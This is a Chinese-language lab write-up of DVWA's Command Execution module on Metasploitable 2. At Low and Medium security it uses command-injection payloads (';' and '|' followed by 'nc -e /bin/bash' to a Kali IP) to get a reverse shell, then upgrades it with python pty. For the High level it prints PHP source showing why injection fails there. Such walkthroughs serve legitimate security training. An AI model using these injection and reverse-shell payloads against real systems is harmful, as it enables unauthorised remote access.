DVWA之Command Execution篇
Command Execution
靶机基本情况
Metasploitable 2中的DVWA
Level: Low
构造语句:
;nc -e /bin/bash 192.168.176.128 5555
其中192.168.176.128为Kali Linux IP 地址
可以成功拿到shell:
┌──(root💀kali)-[~/Desktop]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.176.128] from (UNKNOWN) [192.168.176.129] 51191
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$
Level: Medium
经过测试用 | 可以绕靠靶机的限制:
如:
127.0.0.1 | ls
返回:
help
index.php
source
因此构造下面的语句以得到靶机的shell
127.0.0.1 | nc -e /bin/bash 192.168.176.128 5555
成功得到靶机的shell:
┌──(root💀kali)-[~/Desktop]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.176.128] from (UNKNOWN) [192.168.176.129] 53321
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$
Level: High
当输入:
127.0.0.1 && ls
返回得到:
ERROR: You have entered an invalid IP
分析源代码:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST["ip"];
$target = stripslashes( $target );
// Split the IP into 4 octects
$octet = explode(".", $target);
// Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
else {
echo '<pre>ERROR: You have entered an invalid IP</pre>';
}
}
?>
安全级别为高时不存在命令注入漏洞。
STRIVE FOR PROGRESS,NOT FOR PERFECTION